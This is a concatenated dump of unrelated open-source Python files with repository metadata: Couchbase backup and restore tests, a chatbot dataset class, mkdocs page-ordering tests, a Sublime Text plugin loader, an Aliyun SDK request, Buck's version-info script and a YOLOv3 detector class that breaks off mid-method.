self.total_backups += 1
self.sleep(60)
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a diff backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a full backup
options = self.command_options + [' -m full']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options, delete_backup=False)
self.total_backups += 1
self.sleep(60)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Combo Full,Incr and Diff Backups')
def testDiffBackupDirStructure(self):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=5)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a diff backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Differential Backup')
def testIncrementalBackup(self):
gen_extra = BlobGenerator('zoom', 'zoom-', self.value_size, end=self.num_items)
self.log.info("Starting Incremental backup")
extra_items_deleted_flag = 0
if(self.doc_ops is not None):
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("update" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "update", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("delete" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "delete", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
extra_items_deleted_flag = 1
if("expire" in self.doc_ops):
if extra_items_deleted_flag == 1:
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
self._load_all_buckets(self.master, gen_extra, "update", self.expire_time, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
def testDifferentialBackup(self):
gen_extra = BlobGenerator('zoom', 'zoom-', self.value_size, end=self.num_items)
self.log.info("Starting Differential backup")
extra_items_deleted_flag = 0
if(self.doc_ops is not None):
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("update" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "update", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("delete" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "delete", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
extra_items_deleted_flag = 1
if("expire" in self.doc_ops):
if extra_items_deleted_flag == 1:
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
self._load_all_buckets(self.master, gen_extra, "update", self.expire_time, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a diff backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
def testFullBackup(self):
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
def testIncrementalBackupConflict(self):
gen_extra = BlobGenerator('zoom', 'zoom-', self.value_size, end=self.num_items)
self.log.info("Starting Incremental backup")
extra_items_deleted_flag = 0
if(self.doc_ops is not None):
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("update" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "update", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
if("delete" in self.doc_ops):
self._load_all_buckets(self.master, gen_extra, "delete", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
extra_items_deleted_flag = 1
if("expire" in self.doc_ops):
if extra_items_deleted_flag == 1:
self._load_all_buckets(self.master, gen_extra, "create", 0, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
self._load_all_buckets(self.master, gen_extra, "update", self.expire_time, 1, self.item_flag, True, batch_size=20000, pause_secs=5, timeout_secs=180)
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self.lww = self.num_mutate_items = self.input.param("lww_new", False)
self._bucket_creation()
self.sleep(20)
expected_error = self.input.param("expected_error", None)
self.restoreAndVerify(bucket_names, kvs_before, expected_error)
class IBRJsonTests(BackupBaseTest):
def setUp(self):
super(IBRJsonTests, self).setUp()
self.num_mutate_items = self.input.param("mutate_items", 1000)
template = '{{ "mutated" : 0, "age": {0}, "first_name": "{1}" }}'
gen_load = DocumentGenerator('load_by_id_test', template, list(range(5)),\
['james', 'john'], start=0, end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", 0, 1,\
self.item_flag, True, batch_size=20000,\
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
if self.test_with_view:
view_list = []
bucket = "default"
if self.dev_view:
prefix_ddoc="dev_ddoc"
else:
prefix_ddoc="ddoc"
ddoc_view_map = self.bucket_ddoc_map.pop(bucket, {})
for ddoc_count in range(self.num_ddocs):
design_doc_name = prefix_ddoc + str(ddoc_count)
view_list = self.make_default_views("views", self.num_views_per_ddoc)
self.create_views(self.master, design_doc_name, view_list,\
bucket, self.wait_timeout * 2)
ddoc_view_map[design_doc_name] = view_list
self.bucket_ddoc_map[bucket] = ddoc_view_map
#Take a full backup
if not self.command_options:
self.command_options = []
options = self.command_options + [' -m full']
self.total_backups = 1
self.shell.execute_cluster_backup(self.couchbase_login_info,\
self.backup_location, options)
self.sleep(2)
def testFullBackup(self):
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
def restoreAndVerify(self, bucket_names, kvs_before):
for bucket in self.buckets:
bucket.kvs[1] = kvs_before[bucket.name]
del kvs_before
gc.collect()
self.shell.restore_backupFile(self.couchbase_login_info,\
self.backup_location, bucket_names)
self.sleep(10)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
self.verify_results(self.master)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
""" add design doc and view """
if self.test_with_view:
result = False
query = {"stale" : "false", "full_set" : "true", \
"connection_timeout" : 60000}
for bucket, ddoc_view_map in list(self.bucket_ddoc_map.items()):
for ddoc_name, view_list in list(ddoc_view_map.items()):
for view in view_list:
try:
result = self.cluster.query_view(self.master,\
ddoc_name, view.name, query,\
self.num_items, timeout=10)
except Exception:
pass
if not result:
self.fail("There is no: View: {0} in Design Doc:"\
" {1} in bucket: {2}"\
.format(view.name, ddoc_name, bucket))
self.log.info("DDoc Data Validation Successful")
def tearDown(self):
super(IBRJsonTests, self).tearDown()
def testMultipleBackups(self):
if not self.command_options:
self.command_options = []
options = self.command_options
if self.backup_type is not None:
if "accu" in self.backup_type:
options = self.command_options + [' -m accu']
if "diff" in self.backup_type:
options = self.command_options + [' -m diff']
diff_backup = [" -m diff"]
accu_backup = [" -m accu"]
current_backup = [" -m diff"]
for count in range(self.number_of_backups):
if "mix" in self.backup_type:
if current_backup == diff_backup:
current_backup = accu_backup
options = self.command_options + accu_backup
elif current_backup == accu_backup:
current_backup = diff_backup
options = self.command_options + diff_backup
# Update data
template = '{{ "mutated" : {0}, "age": {0}, "first_name": "{1}" }}'
gen_update = DocumentGenerator('load_by_id_test', template, list(range(5)),\
['james', 'john'], start=0, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1,\
self.item_flag, True, batch_size=20000,\
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a backup
self.shell.execute_cluster_backup(self.couchbase_login_info,\
self.backup_location, options)
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
class IBRSpatialTests(SpatialQueryTests):
def setUp(self):
self.input = TestInputSingleton.input
self.servers = self.input.servers
self.master = self.servers[0]
self.log = logger.Logger.get_logger()
self.helper = SpatialHelper(self, "default")
self.helper.setup_cluster()
self.cluster = Cluster()
self.default_bucket = self.input.param("default_bucket", True)
self.sasl_buckets = self.input.param("sasl_buckets", 0)
self.standard_buckets = self.input.param("standard_buckets", 0)
self.memcached_buckets = self.input.param("memcached_buckets", 0)
self.servers = self.helper.servers
self.shell = RemoteMachineShellConnection(self.master)
info = self.shell.extract_remote_info()
self.os = info.type.lower()
self.couchbase_login_info = "%s:%s" % (self.input.membase_settings.rest_username,
self.input.membase_settings.rest_password)
self.backup_location = self.input.param("backup_location", "/tmp/backup")
self.command_options = self.input.param("command_options", '')
def tearDown(self):
self.helper.cleanup_cluster()
def test_backup_with_spatial_data(self):
num_docs = self.helper.input.param("num-docs", 5000)
self.log.info("description : Make limit queries on a simple "
"dataset with {0} docs".format(num_docs))
data_set = SimpleDataSet(self.helper, num_docs)
data_set.add_limit_queries()
self._query_test_init(data_set)
if not self.command_options:
self.command_options = []
options = self.command_options + [' -m full']
self.total_backups = 1
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
time.sleep(2)
self.buckets = RestConnection(self.master).get_buckets()
bucket_names = [bucket.name for bucket in self.buckets]
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
gc.collect()
self.helper._create_default_bucket()
self.shell.restore_backupFile(self.couchbase_login_info, self.backup_location, bucket_names)
SimpleDataSet(self.helper, num_docs)._create_views()
self._query_test_init(data_set)
| 45.528391
| 165
| 0.626988
|
d62050555f82deb3266bfe8e0e3782aaa6ad706f
| 500
|
py
|
Python
|
util/dataset_util.py
|
HaveTwoBrush/chatbot
|
5532604c810e3e0cb94eb53eecfb07ac9e286ea5
|
[
"Apache-2.0"
] | 29
|
2019-01-15T02:06:55.000Z
|
2019-11-03T13:39:36.000Z
|
util/dataset_util.py
|
kinggreenhall/chatbot
|
5532604c810e3e0cb94eb53eecfb07ac9e286ea5
|
[
"Apache-2.0"
] | 1
|
2019-05-01T06:30:41.000Z
|
2019-05-03T13:59:20.000Z
|
util/dataset_util.py
|
kinggreenhall/chatbot
|
5532604c810e3e0cb94eb53eecfb07ac9e286ea5
|
[
"Apache-2.0"
] | 5
|
2019-03-27T08:44:07.000Z
|
2019-11-05T15:49:50.000Z
|
from torch.utils.data import Dataset
import numpy as np
from util.data_util import DataUtil
class DatasetUtil(Dataset):
def __init__(self, conf):
self.data_util = DataUtil(conf)
self.input_list, self.target_list, self.intent_list = self.data_util.get_train_data()
def __getitem__(self, index):
return np.array(self.input_list[index]), np.array(self.target_list[index]), np.array(self.intent_list[index])
def __len__(self):
return len(self.input_list)
| 29.411765
| 117
| 0.722
|
344b9d54c7f9db672d083ac4f06351543535735f
| 3,575
|
py
|
Python
|
mkdocs_awesome_pages_plugin/tests/e2e/test_order.py
|
marcovoc/mkdocs-awesome-pages-plugin
|
8b489024c1a545fead6e7338fffb29b98c657bdc
|
[
"MIT"
] | null | null | null |
mkdocs_awesome_pages_plugin/tests/e2e/test_order.py
|
marcovoc/mkdocs-awesome-pages-plugin
|
8b489024c1a545fead6e7338fffb29b98c657bdc
|
[
"MIT"
] | null | null | null |
mkdocs_awesome_pages_plugin/tests/e2e/test_order.py
|
marcovoc/mkdocs-awesome-pages-plugin
|
8b489024c1a545fead6e7338fffb29b98c657bdc
|
[
"MIT"
] | null | null | null |
from .base import E2ETestCase
class TestOrder(E2ETestCase):
def test_asc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
("2", ["1.md", "2.md", self.pagesFile(order="asc")]),
self.pagesFile(order="asc"),
],
)
self.assertEqual(
navigation,
[("1", "/1"), ("2", [("1", "/2/1"), ("2", "/2/2")]), ("3", "/3")],
)
def test_desc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
("2", ["1.md", "2.md", self.pagesFile(order="desc")]),
self.pagesFile(order="desc"),
],
)
self.assertEqual(
navigation,
[("3", "/3"), ("2", [("2", "/2/2"), ("1", "/2/1")]), ("1", "/1")],
)
def test_nav_asc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
(
"2",
["1.md", "2.md", self.pagesFile(order="asc", nav=["2.md", "1.md"])],
),
self.pagesFile(order="asc", nav=["2", "1.md", "3.md"]),
],
)
self.assertEqual(
navigation,
[("2", [("2", "/2/2"), ("1", "/2/1")]), ("1", "/1"), ("3", "/3")],
)
def test_nav_desc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
(
"2",
[
"1.md",
"2.md",
self.pagesFile(order="desc", nav=["2.md", "1.md"]),
],
),
self.pagesFile(order="desc", nav=["2", "1.md", "3.md"]),
],
)
self.assertEqual(
navigation,
[("2", [("2", "/2/2"), ("1", "/2/1")]), ("1", "/1"), ("3", "/3")],
)
def test_nav_rest_asc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
(
"2",
[
"1.md",
"2.md",
"3.md",
self.pagesFile(order="asc", nav=["3.md", "..."]),
],
),
self.pagesFile(order="asc", nav=["3.md", "..."]),
],
)
self.assertEqual(
navigation,
[
("3", "/3"),
("1", "/1"),
("2", [("3", "/2/3"), ("1", "/2/1"), ("2", "/2/2")]),
],
)
def test_nav_rest_desc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
(
"2",
[
"1.md",
"2.md",
"3.md",
self.pagesFile(order="desc", nav=["1.md", "..."]),
],
),
self.pagesFile(order="desc", nav=["1.md", "..."]),
],
)
self.assertEqual(
navigation,
[
("1", "/1"),
("3", "/3"),
("2", [("1", "/2/1"), ("3", "/2/3"), ("2", "/2/2")]),
],
)
| 26.679104
| 88
| 0.272727
|
a7c11d7903fe334596362791ad0ba48ed9e33119
| 3,309
|
py
|
Python
|
main.py
|
k5md/Terminus
|
101c8d439cf98cc56829cc72e4f8dd9f7773e4e5
|
[
"MIT"
] | null | null | null |
main.py
|
k5md/Terminus
|
101c8d439cf98cc56829cc72e4f8dd9f7773e4e5
|
[
"MIT"
] | null | null | null |
main.py
|
k5md/Terminus
|
101c8d439cf98cc56829cc72e4f8dd9f7773e4e5
|
[
"MIT"
] | null | null | null |
import sublime
import sys
import logging
try:
from .terminus.commands import (
TerminusCommandsEventListener,
TerminusOpenCommand,
TerminusCloseCommand,
TerminusCloseAllCommand,
TerminusViewEventListener,
TerminusInitializeCommand,
TerminusActivateCommand,
TerminusClearHistoryCommand,
TerminusMaximizeCommand,
TerminusMinimizeCommand,
TerminusRenderCommand,
TerminusKeypressCommand,
TerminusCopyCommand,
TerminusPasteCommand,
TerminusPasteFromHistoryCommand,
TerminusDeleteWordCommand,
ToggleTerminusPanelCommand,
TerminusSendStringCommand,
TerminusShowCursor,
TerminusInsertCommand
)
from .terminus.edit_settings import (
TerminusEditSettingsListener,
TerminusEditSettingsCommand
)
from .terminus.mouse import (
TerminusMouseEventListener,
TerminusOpenContextUrlCommand,
TerminusClickCommand,
TerminusOpenImageCommand
)
from .terminus.query import TerminusQueryContextListener
from .terminus.theme import (
TerminusSelectThemeCommand,
TerminusGenerateThemeCommand,
plugin_loaded as theme_plugin_loaded,
plugin_unloaded as theme_plugin_unloaded
)
from .terminus.utils import settings_on_change
except ImportError:
pass
__all__ = [
"TerminusCommandsEventListener", "TerminusOpenCommand", "TerminusCloseCommand",
"TerminusCloseAllCommand",
"TerminusViewEventListener", "TerminusInitializeCommand", "TerminusActivateCommand",
"TerminusClearHistoryCommand", "TerminusMaximizeCommand", "TerminusMinimizeCommand",
"TerminusRenderCommand", "TerminusKeypressCommand", "TerminusCopyCommand",
"TerminusPasteCommand", "TerminusShowCursor", "TerminusInsertCommand",
"TerminusPasteFromHistoryCommand", "TerminusDeleteWordCommand", "ToggleTerminusPanelCommand",
"TerminusSendStringCommand",
"TerminusSelectThemeCommand", "TerminusGenerateThemeCommand",
"TerminusEditSettingsListener", "TerminusEditSettingsCommand",
"TerminusMouseEventListener", "TerminusOpenContextUrlCommand", "TerminusClickCommand",
"TerminusOpenImageCommand",
"TerminusQueryContextListener"
]
logger = logging.getLogger('Terminus')
def plugin_loaded():
try:
from package_control import events
if events.post_upgrade(__package__):
from .tools.reloader import reload_package
reload_package(__package__)
except ImportError:
pass
theme_plugin_loaded()
if not logger.hasHandlers():
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
settings = sublime.load_settings("Terminus.sublime-settings")
def on_change(debug):
if debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
on_change(settings.get("debug", False))
settings_on_change(settings, "debug")(on_change)
def plugin_unloaded():
# close all terminals
for w in sublime.windows():
w.run_command("terminus_close_all")
theme_plugin_unloaded()
settings = sublime.load_settings("Terminus.sublime-settings")
settings_on_change(settings, "debug", clear=True)
| 31.514286
| 97
| 0.723179
|
142e61c3bbb6d8a056fec96649fa1fbd7d3b4e5f
| 1,668
|
py
|
Python
|
aliyun-python-sdk-cloudauth/aliyunsdkcloudauth/request/v20180504/GetMaterialsRequest.py
|
DataDog/aliyun-openapi-python-sdk
|
5cbee29bce6416dd62f61f0c3786b1af6ea0d84f
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-cloudauth/aliyunsdkcloudauth/request/v20180504/GetMaterialsRequest.py
|
DataDog/aliyun-openapi-python-sdk
|
5cbee29bce6416dd62f61f0c3786b1af6ea0d84f
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-cloudauth/aliyunsdkcloudauth/request/v20180504/GetMaterialsRequest.py
|
DataDog/aliyun-openapi-python-sdk
|
5cbee29bce6416dd62f61f0c3786b1af6ea0d84f
|
[
"Apache-2.0"
] | 1
|
2021-02-23T11:27:54.000Z
|
2021-02-23T11:27:54.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class GetMaterialsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cloudauth', '2018-05-04', 'GetMaterials','cloudauth')
self.set_protocol_type('https');
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_Biz(self):
return self.get_query_params().get('Biz')
def set_Biz(self,Biz):
self.add_query_param('Biz',Biz)
def get_SourceIp(self):
return self.get_query_params().get('SourceIp')
def set_SourceIp(self,SourceIp):
self.add_query_param('SourceIp',SourceIp)
def get_TicketId(self):
return self.get_query_params().get('TicketId')
def set_TicketId(self,TicketId):
self.add_query_param('TicketId',TicketId)
| 34.040816
| 83
| 0.758993
|
b8f0bb8060ab25aa487d9619535fba08b785d434
| 3,103
|
py
|
Python
|
programs/gen_buck_info.py
|
isfaaghyth/buck
|
cad8f7ac2de2c9a4f08ce66180db677e44d61aee
|
[
"Apache-2.0"
] | 2
|
2019-09-22T05:33:37.000Z
|
2019-09-22T06:36:24.000Z
|
programs/gen_buck_info.py
|
isfaaghyth/buck
|
cad8f7ac2de2c9a4f08ce66180db677e44d61aee
|
[
"Apache-2.0"
] | 1
|
2019-10-22T21:07:17.000Z
|
2019-10-22T21:07:17.000Z
|
programs/gen_buck_info.py
|
isfaaghyth/buck
|
cad8f7ac2de2c9a4f08ce66180db677e44d61aee
|
[
"Apache-2.0"
] | 1
|
2019-10-22T20:43:48.000Z
|
2019-10-22T20:43:48.000Z
|
# Copyright 2018-present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import errno
import json
import os
import sys
import time
import buck_version
import java_version
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument("--release-version", help="The buck release version")
parser.add_argument(
"--release-timestamp", help="The unix timestamp when the release happened"
)
parser.add_argument(
"--java-version",
help="The Java version buck was compiled against",
required=True,
)
args = parser.parse_args(argv[1:])
if bool(args.release_version) != bool(args.release_timestamp):
print(
"--release-version and --release-timestamp must either both be "
"set, or neither can be set"
)
sys.exit(1)
# Locate the root of the buck repo. We'll need to be there to
# generate the buck version UID.
path = os.getcwd()
while not os.path.exists(os.path.join(path, ".buckconfig")):
path = os.path.dirname(path)
if args.release_version:
version = args.release_version
timestamp = args.release_timestamp
dirty = False
elif os.path.exists(os.path.join(path, ".git")):
# Attempt to create a "clean" version, but fall back to a "dirty"
# one if need be.
version = buck_version.get_clean_buck_version(path)
timestamp = -1
if version is None:
version = buck_version.get_dirty_buck_version(path)
else:
timestamp = buck_version.get_git_revision_timestamp(path)
dirty = buck_version.is_dirty(path)
else:
# We're building outside a git repo. Check for the special
# .buckrelease file created by the release process.
try:
with open(os.path.join(path, ".buckrelease")) as f:
timestamp = int(os.fstat(f.fileno()).st_mtime)
version = f.read().strip()
except IOError as e:
if e.errno == errno.ENOENT:
# No .buckrelease file. Do the best that we can.
version = "(unknown version)"
timestamp = int(time.time())
else:
raise e
dirty = False
json.dump(
{
"version": version,
"timestamp": timestamp,
"is_dirty": dirty,
"java_version": java_version.get_java_major_version(args.java_version),
},
sys.stdout,
sort_keys=True,
indent=2,
)
sys.exit(main(sys.argv))
| 32.663158
| 83
| 0.629069
|
ea48941b0ed9c3c646bb83ca108aa7b8cb7e30c8
| 8,791
|
py
|
Python
|
yolo.py
|
chenqianqianxiaoxiannv/yolo
|
0fa5025490b841cb1a2fd1b6188fb410ed4b2d1e
|
[
"MIT"
] | null | null | null |
yolo.py
|
chenqianqianxiaoxiannv/yolo
|
0fa5025490b841cb1a2fd1b6188fb410ed4b2d1e
|
[
"MIT"
] | null | null | null |
yolo.py
|
chenqianqianxiaoxiannv/yolo
|
0fa5025490b841cb1a2fd1b6188fb410ed4b2d1e
|
[
"MIT"
] | 1
|
2019-12-12T12:03:10.000Z
|
2019-12-12T12:03:10.000Z
|
# -*- coding: utf-8 -*-
"""
Class definition of YOLO_v3 style detection model on image and video
"""
import colorsys
import os
from timeit import default_timer as timer
import numpy as np
from keras import backend as K
from keras.models import load_model
from keras.layers import Input
from PIL import Image, ImageFont, ImageDraw
from yolo3.model import yolo_eval, yolo_body, tiny_yolo_body
from yolo3.utils import letterbox_image
import os
from keras.utils import multi_gpu_model
class YOLO(object):
_defaults = {
"model_path": 'model_data/yolo.h5',
"anchors_path": 'model_data/yolo_anchors.txt',
"classes_path": 'model_data/coco_classes.txt',
"score" : 0.3,
"iou" : 0.45,
"model_image_size" : (416, 416),
"gpu_num" : 1,
}
@classmethod#静态类
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def __init__(self, **kwargs):
self.__dict__.update(self._defaults) # set up default values
self.__dict__.update(kwargs) # and update with user overrides并使用用户覆盖进行更新
self.class_names = self._get_class()
self.anchors = self._get_anchors()
self.sess = K.get_session()
self.boxes, self.scores, self.classes = self.generate()
def _get_class(self):#读取coco_classes.text文件中的内容,并去除首尾的空格,将其内容返还
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def _get_anchors(self):#读取yolo_anchors.txt的内容,去除“,”,将其中的数字内容组成np矩阵,并返还
anchors_path = os.path.expanduser(self.anchors_path)
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def generate(self):
model_path = os.path.expanduser(self.model_path)#指的是yolo.h5
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
# Load model, or construct model and load weights.负载模型,或构造模型和负载权重。
num_anchors = len(self.anchors)#行数
num_classes = len(self.class_names)#类别数
is_tiny_version = num_anchors==6 # default setting
try:
self.yolo_model = load_model(model_path, compile=False)#载入模型
except:
self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \
if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)
self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match确保模型、锚和类匹配
else:
assert self.yolo_model.layers[-1].output_shape[-1] == \
num_anchors/len(self.yolo_model.output) * (num_classes + 5), \
'Mismatch between model and given anchor and class sizes'
print('{} model, anchors, and classes loaded.'.format(model_path))
# Generate colors for drawing bounding boxes.
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
np.random.seed(10101) # Fixed seed for consistent colors across runs.固定种子的颜色一致运行。
np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.无序播放颜色以取消相邻类的关联。
np.random.seed(None) # Reset seed to default.将种子重置为默认值。
# Generate output tensor targets for filtered bounding boxes.为过滤后的边界框生成输出张量目标。
self.input_image_shape = K.placeholder(shape=(2, ))
if self.gpu_num>=2:
self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)#进行多个GPU训练
boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,
len(self.class_names), self.input_image_shape,
score_threshold=self.score, iou_threshold=self.iou)
return boxes, scores, classes
def detect_image(self, image):
start = timer()
if self.model_image_size != (None, None):
assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'
assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'
boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))#对图像调整输入尺寸
else:
new_image_size = (image.width - (image.width % 32),
image.height - (image.height % 32))
boxed_image = letterbox_image(image, new_image_size)
image_data = np.array(boxed_image, dtype='float32')
print(image_data.shape)
image_data /= 255.
image_data = np.expand_dims(image_data, 0) # Add batch dimension.
out_boxes, out_scores, out_classes = self.sess.run(
[self.boxes, self.scores, self.classes],
feed_dict={
self.yolo_model.input: image_data,
self.input_image_shape: [image.size[1], image.size[0]],
K.learning_phase(): 0
})
# #######
print('Found {} boxes for {}'.format(len(out_boxes), 'img'))
font = ImageFont.truetype(font='font/FiraMono-Medium.otf',
size=np.floor(3e-2 * image.size[1] + 0.5).astype('int32'))
thickness = (image.size[0] + image.size[1]) // 300
for i, c in reversed(list(enumerate(out_classes))):
predicted_class = self.class_names[c]
box = out_boxes[i]
score = out_scores[i]
label = '{} {:.2f}'.format(predicted_class, score)
draw = ImageDraw.Draw(image)
label_size = draw.textsize(label, font)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(image.size[0], np.floor(right + 0.5).astype('int32'))
print(label, (left, top), (right, bottom))
